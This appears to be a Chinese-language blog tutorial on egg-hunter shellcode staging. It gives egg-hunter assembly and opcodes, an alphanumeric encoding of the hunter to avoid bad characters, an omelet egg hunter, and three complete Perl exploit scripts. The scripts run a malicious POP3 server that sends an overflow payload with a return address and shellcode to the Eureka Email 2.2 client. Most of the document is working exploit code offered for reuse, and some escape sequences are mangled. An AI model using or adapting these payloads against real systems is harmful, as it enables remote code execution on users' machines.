寻蛋技术是 Staged shellcode 技术的一种
寻蛋 是利用一小段代码 来在内存中寻找真正的(代码尺寸较大的)shellcode(the egg)的技术。
也就是是 利用好一小段代码被执行,然后找到真正的shellcode并且执行
3个前置条件:
1)必须能够跳转(jmp call push/ret)并且执行一些shellcode。这时有效的缓冲区内存可以相对小一些,以为这时只需要保存那些寻蛋代码(egg hunter)
寻蛋代码必须被防止在预先设定的位置,这样才能控制代码可靠地跳转到寻蛋代码然后执行寻蛋代码
2)最终要执行shellcode必须在内存的某个位置(堆,栈)存在
3)必须最终要执行的shellcode的前面放置 唯一标识。最初执行的shellcode(寻蛋代码)将逐字节的搜寻内存来寻找这个标识。
找到后jmp call 指令开始执行跟在标志后的代码。
遇到问题: 1 一段时间 CPU 占用 2经过很长时间,shellcode才能开始执行
技术基础:
1)用到的标识是唯一的(通常前4个字节来定义标识,然后把两个连续的标识8字节放在真正的shellcode前面)
2)对于特定的exploit , 需要测试哪个内存搜索技术可以工作(eg: NTAccessCheckAndAuditAlarm)
3) 不同的技术需要不同大小的存储空间来存储寻蛋代码:
1 利用SEH 的寻蛋 需要大约60字节,
00401580 > /EB 21 jmp Xtestexpl.004015A3 00401582 |59 pop ecx 00401583 |B8 70616E64 mov eax,0x646E6170 00401588 |51 push ecx 00401589 |6A FF push -0x1 0040158B |33DB xor ebx,ebx 0040158D |64:8923 mov dword ptr fs:[ebx],esp 00401590 |6A 02 push 0x2 00401592 |59 pop ecx 00401593 |8BFB mov edi,ebx 00401595 |F3:AF repe scas dword ptr es:[edi] 00401597 |75 07 jnz Xtestexpl.004015A0 00401599 |FFE7 jmp edi 0040159B |66:81CB FF0F or bx,0xFFF 004015A0 |43 inc ebx 004015A1 ^|EB ED jmp Xtestexpl.00401590 004015A3 E8 DAFFFFFF call testexpl.00401582 004015A8 6A 0C push 0xC 004015AA 59 pop ecx 004015AB 8B040C mov eax,dword ptr ss:[esp+ecx] 004015AE B1 B8 mov cl,0xB8 004015B0 830408 06 add dword ptr ds:[eax+ecx],0x6 004015B4 58 pop eax 004015B5 83C4 10 add esp,0x10 004015B8 50 push eax 004015B9 33C0 xor eax,eax 004015BB C3 retn
43 EB ED E8 DA FF FF FF 6A 0C 59 8B 04 0C B1 B8 83 04 08 06 58 83 C4 10 50 33 C0 C3
2 利用IsBadReadPtr 需要37字节 ,
3 NtDisplayString 需要32字节(NT核心)
4 NTAccessCheckAndAuditAlarm寻蛋
L000: or dx,0xFFF L001: inc edx push edx push 0x43 ;这里0x43则表示使用NtDisplayString 0x2 表示NtAccessCheckAndAuditAlarm pop eax int 0x2E cmp al,0x5 ;check 0xc0000005 == ACCESS_VIOLATION pop edx je L000 mov eax,0x50905090 ;this is the egg mov edi,edx scas dword ptr es:[edi] jnz L001 scas dword ptr es:[edi] jnz L001 jmp edi66 81 CA FF 0F 42 52 6A 0258 CD 2E 3C 05 5A 74 EF B8 70 61 6e 64 8B FA AF 75 EA AF 75 E7 FF E7
x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x70x61x6ex64x8BxFAxAFx75xEAxAFx75xE7xFFxE7
70 61 6E 64 -> pand
具体采用哪种寻蛋方案 主要取决于: 1 运行寻蛋代码所需要的 缓冲区大小 2你需要测试选用的搜索内存的技术是否能在您的机器上和你要利用的exploit上正常工作
什么情况下用这种技术呢? 1)我们插入shellcode 某一部分变了,2)不知道要NOP多少字节才放入shellcode
!mona egg -t pand
产生 egg hunter code
举个例子: eureka-email Version 2.2
pop3简介: http://baike.baidu.com/view/5404.htm?fr=aladdin#3_7
软件 下载地址: http://www.eureka-email.com/VersionHistory.html
配置如下:
普通的POC (没有任何阻力的情况下):
use Socket;
#Log data, 条目 109
#地址=7DCFD8E4
#消息=Found JMP ESP at 0x7dcfd8e4 Module: C:WINDOWSsystem32SHELL32.dll
my $junk="x41" x 709;
my $ret = pack('V',0x7DCFD8E4); #jump to ESP - run !pvefindaddr j -r ESP -n to find an address
my $shellcode=("xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C".
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53".
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B".
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95".
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59".
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A".
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75".
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03".
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB".
"x53".
"x68x64x61x30x23".
"x68x23x50x61x6E".
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8");
my $payload=$junk.$ret.$shellcode;
my $port = 110;
my $proto = getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr = sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listenning on tcp port 110 [POP3]...
";
print "Configure Eureka Mail Client to connect to this host
";
my $client_addr;
if ($client_addr = accept(CLIENT,SERVER))
{
print "[+] Client Connected.
";
while (1) {
#POP服务器使用应答对此回应,“+OK”表示命令成功,"-ERR"表示命令失败,后面是简单的文字说明,
#例如"+OK Password required for Bob" 表示USER命令成功执行,需要客户输入密码进行认证
print CLIENT "-ERR".$payload."
";
print " ->Sent ".length($payload)." bytes
";
}
}
close CLIENT;
print "Connection closed
";今天要主要的内容 构造的POC如下:
如果shellcode 的地址会变 或者shellcode大小 很小,那么就要用到今天学习的 egg hunting 技术了
简单egghunting 如下:
还有漏洞的: 这里shellcode因为在 .data 所以可以搜索到,如果shellcode在堆呢 ,edx太大直接就跳过搜索shellcode的位置了
use Socket;
#Log data, 条目 109
#地址=7DCFD8E4
#消息=Found JMP ESP at 0x7dcfd8e4 Module: C:WINDOWSsystem32SHELL32.dll
my $junk="x41" x 709;
my $ret = pack('V',0x7DCFD8E4); #jump to ESP - run !pvefindaddr j -r ESP -n to find an address
my $egghunter = ("x66x81xCAxFFx0Fx42x52x6A".
"x02".
"x58xCDx2Ex3Cx05x5Ax74xEFxB8".
"x70x61x6ex64".
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7");
my $padding = "x42"x 1000;
my $shellcode=("xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C".
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53".
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B".
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95".
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59".
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A".
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75".
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03".
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB".
"x53".
"x68x64x61x30x23".
"x68x23x50x61x6E".
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8");
my $payload=$junk.$ret.$egghunter.$padding."pandpand".$shellcode;
my $port = 110;
my $proto = getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr = sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listenning on tcp port 110 [POP3]...
";
print "Configure Eureka Mail Client to connect to this host
";
my $client_addr;
if ($client_addr = accept(CLIENT,SERVER))
{
print "[+] Client Connected.
";
while (1) {
#POP服务器使用应答对此回应,“+OK”表示命令成功,"-ERR"表示命令失败,后面是简单的文字说明,
#例如"+OK Password required for Bob" 表示USER命令成功执行,需要客户输入密码进行认证
print CLIENT "-ERR".$payload."
";
print " ->Sent ".length($payload)." bytes
";
}
}
close CLIENT;
print "Connection closed
";
不停把 edx作为寻找的地址 进行递加,然后搜索 pandpand 两个蛋
(漏洞: 这里shellcode因为在 .data 所以可以搜索到,如果shellcode在堆呢 ,edx太大直接就跳过搜索shellcode的位置了,
直接调整搜索位置在 彩蛋前面一点,然才开始搜索就行了)
找到 两个蛋后,将蛋后面的shellcode 地址放入edx,最后jmp edx
有漏洞的地方总结:
1)遇到 搜索位置在彩蛋之后,
2)内存中有多份拷贝,有些拷贝损坏了(毕竟只检查前面8字节而已)
那么就需要修改 or dx,0xFFF ,使得搜索位置变为 彩蛋之前就行了
下面学习 给
Egghunter 加密解密 去除掉bad characters:
这里选用 NtDisplayString / NtAccessCheckAndAuditAlarm 进行编码
L000: or dx,0xFFF L001: inc edx push edx push 0x43 ;这里0x43则表示使用NtDisplayString 0x2 表示NtAccessCheckAndAuditAlarm pop eax int 0x2E cmp al,0x5 ;check 0xc0000005 == ACCESS_VIOLATION pop edx je L000 mov eax,0x50905090 ;this is the egg mov edi,edx scas dword ptr es:[edi] jnz L001 scas dword ptr es:[edi] jnz L001 jmp edi
可以平均分为 4个字节
66 81 CA FF
0F 42 52 6A
02 58 CD 2E
3C 05 5A 74
EF B8 70 61
6e 64 8B FA
AF 75 EA AF
75 E7 FF E7
以最后一行进行编码: 75 e7 ff e7 翻转-》 e7 ff e7 75 反码-》18 00 18 8b (0减去它) 然后找出3个数的和等于 反码 并且只用到 x40 x3f x3a x2f 4个字母 以外的 ascii-printable 字符 找到的3个值就是用在 sub eax,<...> 指令中 因为解码的值要被压入栈中,所以要从最后一行开始编码。当最后一个值被压进栈中后,ESP就指向解码后的寻蛋代码的第一个字符 处理第一个字节 这里是 18 3个数和为18 这里需要使和溢出 得到 18 第一个数通常使用 0x55 (85 因为85x 3 =255 溢出 0x20为最小空格 0x7f =127是最大 ascii-printable 字符 ) 和 0x7f之间的值,
注意下面的计算式考虑了 溢出进位了的
18-》118 5d + 5d + 5d 00 -> 255 55+ 55 + 55 18 -> 118 5d + 5d + 5e 8b 30 + 30 + 2b sub eax,0x5d555d30 sub eax,0x5d555d30 sub eax,0x5d555e2b // 三个数相加 等于 11800188B 也就是in dword 1800188B 倒数第二行: af 75 ea af -> af ea 75 af -> 50 15 8a 51 50 -》 70 + 70 + 6f 15 -> 115 ->5c + 5c + 5d 8a -> 2e + 2e + 2d 51 -> 70 + 70 + 71 sub eax,0x705c2e70 sub eax,0x705c2e70 sub eax,0x6f5d2d71 //三个数相加 等于 150158a51 也就是 150158a51 倒数第三行: 6e 64 8B FA -> fa 8b 64 6e -> 05 74 9b 92 05 ->105 -> 57 + 57 +56 74 -> 174 -> 7c + 7c + 7c 9b -> 33+33 +35 92 -> 30+30+32 sub eax,0x577c3330 sub eax,0x577c3330 sub eax,0x567c3532 //三个数相加 等于 105749b92 -> 05749b92 倒数第四行:ef b8 70 61 -> 61 70 b8 ef -> 9e 8f 47 11 9e -> 34 + 34 + 36 8f -> 2f + 2f +30 47 ->147-> 6d + 6d + 6c 11 -> 111 -> 5b + 5b + 5b sub eax,0x342f6d5b sub eax,0x342f6d5b sub eax,0x36306c5b // 三个数相加 等于 9e8f 4711 倒数第五行: 3c 05 5a 74 -> 74 5a 05 3c -> 8b a5 fa c4 sub eax,0x30305342 sun eax,0x30305341 sub eax.0x2b455441//三个数相加等于8b a5 fa c4 倒数第六行: 02 58 CD 2E -> 2e cd 58 02 -> d1 32 a7 fe sub eax,0x46663054 sub eax,0x46663055 sub eax,0x44664755 //三个数相加等于 d132a7fe 倒数第七行: 0F 42 52 6A -> 6a 52 42 0f -> 95 ad bd f1 sub eax,0x31393e50 sub eax,0x32393e50 sub eax,323b4151 最后一行: sub eax,0x55703533 sub eax,0x55702533 sub eax,0x55552434 上面这些代码块前面还要放置 把 eax清0 的代码 and eax,554e4d4a and eax,2a313235 // 也就是7f7f7f7f 两个5字节指令 (25 4A 4D 4E 55 25 35 32 31 2A)
每个块前面还必须增加 push eax,把结果压栈
每个块大小为 10(eax清零) + 15(用于解码)+ 1(push eax ) = 26 字节 8个块 占用208字节
将 egg hunter 放入 栈中,它自己本身马上要运行到栈地址了 下面为上面的二进制码
25 4A 4D 4E 55 25 35 32 31 2A 2D 30 5D 55 5D 2D 30 5D 55 5D 2D 2B 5E 55 5D 50 25 4A 4D 4E 55 25
35 32 31 2A 2D 70 2E 5C 70 2D 70 2E 5C 70 2D 71 2D 5D 6F 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 30
33 7C 57 2D 30 33 7C 57 2D 32 35 7C 56 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 5B 6D 2F 34 2D 5B 6D
2F 34 2D 5B 6C 30 36 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 42 53 30 30 2D 41 53 30 30 2D 41 54 45
2B 50 25 4A 4D 4E 55 25 35 32 31 2A 2D 54 30 66 46 2D 55 30 66 46 2D 55 47 66 44 50 25 4A 4D 4E
55 25 35 32 31 2A 2D 50 3E 39 31 2D 50 3E 39 32 2D 51 41 3B 32 50 25 4A 4D 4E 55 25 35 32 31 2A
2D 33 35 70 55 2D 33 25 70 55 2D 34 24 55 55 50
这里会遇到 edx 过大 跳过了 shellcode的情况
再加一条 and edx,0 还要注意 长度 POC:
use Socket;
#Log data, 条目 109
#地址=7DCFD8E4
#消息=Found JMP ESP at 0x7dcfd8e4 Module: C:WINDOWSsystem32SHELL32.dll
my $junk="x41" x 709;
my $ret = pack('V',0x7DCFD8E4); #jump to ESP - run !pvefindaddr j -r ESP -n to find an address
my $egghunter = ("x61x61x61x61x61x61x61x61".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".#eax清零
"x2Dx30x5Dx55x5D".
"x2Dx30x5Dx55x5D".
"x2Dx2Bx5Ex55x5D".
"x50".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".#eax清零
"x2Dx70x2Ex5Cx70".
"x2Dx70x2Ex5Cx70".
"x2Dx71x2Dx5Dx6F".
"x50".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".#eax清零
"x2Dx30x33x7Cx57".
"x2Dx30x33x7Cx57".
"x2Dx32x35x7Cx56".
"x50".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".#eax清零
"x2Dx5Bx6Dx2Fx34".
"x2Dx5Bx6Dx2Fx34".
"x2Dx5Bx6Cx30x36".
"x50".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".#eax清零
"x2Dx42x53x30x30".
"x2Dx41x53x30x30".
"x2Dx41x54x45x2B".
"x50".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".#eax清零
"x2Dx54x30x66x46".
"x2Dx55x30x66x46".
"x2Dx55x47x66x44".
"x50".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".#eax清零
"x2Dx50x3Ex39x31".
"x2Dx50x3Ex39x32".
"x2Dx51x41x3Bx32".
"x50".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".#eax清零
"x2Dx33x35x70x55".
"x2Dx33x25x70x55".
"x2Dx34x24x55x55".
"x50"."x83xE2x01"); //增加一条and edx,0x1 将edx变小
my $padding = "x42"x 1000;
my $shellcode=("xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C".
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53".
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B".
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95".
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59".
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A".
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75".
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03".
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB".
"x53".
"x68x64x61x30x23".
"x68x23x50x61x6E".
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8");
my $payload=$junk.$ret.$egghunter.$padding."pandpand".$shellcode;
my $port = 110;
my $proto = getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr = sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listenning on tcp port 110 [POP3]...
";
print "Configure Eureka Mail Client to connect to this host
";
my $client_addr;
if ($client_addr = accept(CLIENT,SERVER))
{
print "[+] Client Connected.
";
while (1) {
#POP服务器使用应答对此回应,“+OK”表示命令成功,"-ERR"表示命令失败,后面是简单的文字说明,
#例如"+OK Password required for Bob" 表示USER命令成功执行,需要客户输入密码进行认证
print CLIENT "-ERR".$payload."
";
print " ->Sent ".length($payload)." bytes
";
}
}
close CLIENT;
print "Connection closed
";
要想学习 Unicode 版本的 EGG HUNTING 就去 看看 http://blog.csdn.net/zcc1414/article/details/27363377
下面学习
Omelet egg hunter````````````
不需要考虑加密代码等,直接分解shellcode即可·············
工具 下载地址: http://www.mediafire.com/download/q5c0gbi55x91cv2/w32+SEH+omelet+shellcode+v0.2+fixed+by+UND3R.rar
NASM 文件 包括 寻蛋代码 PY脚本 包括拆分 shellcode
nasm.exe -f bin -o w32_omelet.bin w32_SEH_omlet.asm -w+error
w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes]
生成的文件包含 omelet egg hunter ,分成小块的需要放在内存某个地方的代码
w32_SEH_omelet.py w32_omelet.bin shellcode.bin 1.txt 100 0x70616e //"pan"
$omelet_code = "x31xFFxBBxFExFFxFFxFFxEBx29x51x64x89x20xFCxB0x5FxF2xAEx50x89xFExADx35xFFx6Ex61x70x83xF8x02x77x12x59xF7xE9x64x03x42x08x97xF3xA4x83xFBxFFx74x25x43x89xF7x31xC0x64x8Bx08x89xCCx59x83xF9xFFx75xF8x5AxE8xC4xFFxFFxFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x03x97xEBxDEx31xC0x64xFFx50x08"; #最后知道这里要NOP掉前面两个字节 xor edi,edi # These are the eggs that need to be injected into the target process # for the omelet shellcode to be able to recreate the original shellcode # (you can insert them as many times as you want, as long as each one is # inserted at least once). They are 100 bytes each: $egg0 = "x5FxFFx6Ex61x70xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06"; $egg1 = "x5FxFEx6Ex61x70x3AxC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53x68x64x61x30x23x68x23x50x61x6Ex8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40"; #前5个字节包含了 5F = 大小 = 95 索引号 = ff-fe 标记= 6e 61 70 ->0x70616e 头部大小= 95 + 5 = 100 #接下来的字节就是从原始shellcode中抠出来对的,多余字节空间用0x40填充 原来shellcode 168 字节
找寻 shellcode 位置 !mona cmp -f c:1egg1.bin
如果完成了就跳转到 下面继续进行················
0012CDC0 31C0 XOR EAX,EAX
0012CDC2 64:FF50 08 CALL DWORD PTR FS:[EAX+8]
就跳转到 拷贝的字符串 即 组装成的shellcode 去执行```````````
文中所用文件已经从原来的版本中修改过,···原先的文章已经被修改了······只需要NOP掉前两个字节即可
POC:
use Socket;
#Log data, 条目 109
#地址=7DCFD8E4
#消息=Found JMP ESP at 0x7dcfd8e4 Module: C:WINDOWSsystem32SHELL32.dll
my $junk="x41" x 712;
my $ret = pack('V',0x7DCFD8E4); #jump to ESP - run !pvefindaddr j -r ESP -n to find an address
my $omelet_code = "x90x90xBBxFExFFxFFxFFxEBx29x51x64x89x20xFCxB0x5FxF2xAEx50x89xFExADx35xFFx6Ex61x70x83xF8x02x77x12x59xF7xE9x64x03x42x08x97xF3xA4x83xFBxFFx74x25x43x89xF7x31xC0x64x8Bx08x89xCCx59x83xF9xFFx75xF8x5AxE8xC4xFFxFFxFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x03x97xEBxDEx31xC0x64xFFx50x08";
# These are the eggs that need to be injected into the target process
# for the omelet shellcode to be able to recreate the original shellcode
# (you can insert them as many times as you want, as long as each one is
# inserted at least once). They are 100 bytes each:
my $egg0 = "x5FxFFx6Ex61x70xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06";
my $egg1 = "x5FxFEx6Ex61x70x3AxC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53x68x64x61x30x23x68x23x50x61x6Ex8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40";
#前5个字节包含了 5F = 大小 = 95 索引号 = ff-fe 标记= 6e 61 70 ->0x70616e 头部大小= 95 + 5 = 100
#接下来的字节就是从原始shellcode中抠出来对的,多余字节空间用0x40填充
my $garbage = "This is a bunch of garbage"x10;
my $padding = "x42"x 1000;
my $shellcode=("xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C".
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53".
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B".
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95".
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59".
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A".
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75".
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03".
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB".
"x53".
"x68x64x61x30x23".
"x68x23x50x61x6E".
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8");
my $payload=$junk.$ret.$omelet_code.$padding.$egg0.$garbage.$egg1.$garbage.$shellcode;
my $port = 110;
my $proto = getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr = sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listenning on tcp port 110 [POP3]...
";
print "Configure Eureka Mail Client to connect to this host
";
my $client_addr;
if ($client_addr = accept(CLIENT,SERVER))
{
print "[+] Client Connected.
";
while (1) {
#POP服务器使用应答对此回应,“+OK”表示命令成功,"-ERR"表示命令失败,后面是简单的文字说明,
#例如"+OK Password required for Bob" 表示USER命令成功执行,需要客户输入密码进行认证
print CLIENT "-ERR".$payload."
";
print " ->Sent ".length($payload)." bytes
";
}
}
close CLIENT;
print "Connection closed
"; 额外提示:
mona 插件 提示 :
Message=Want more info about a given command ? Run !mona help <command>
compare / cmp 寻找没有被修改的shellcode 备份,并且提示。在这里能用到
这个插件功能与以前学习的 WINDBG插件相比要好用一些
另外还可以 使用 meterpreter 详细查看:
http://write.blog.csdn.net/postedit/21300395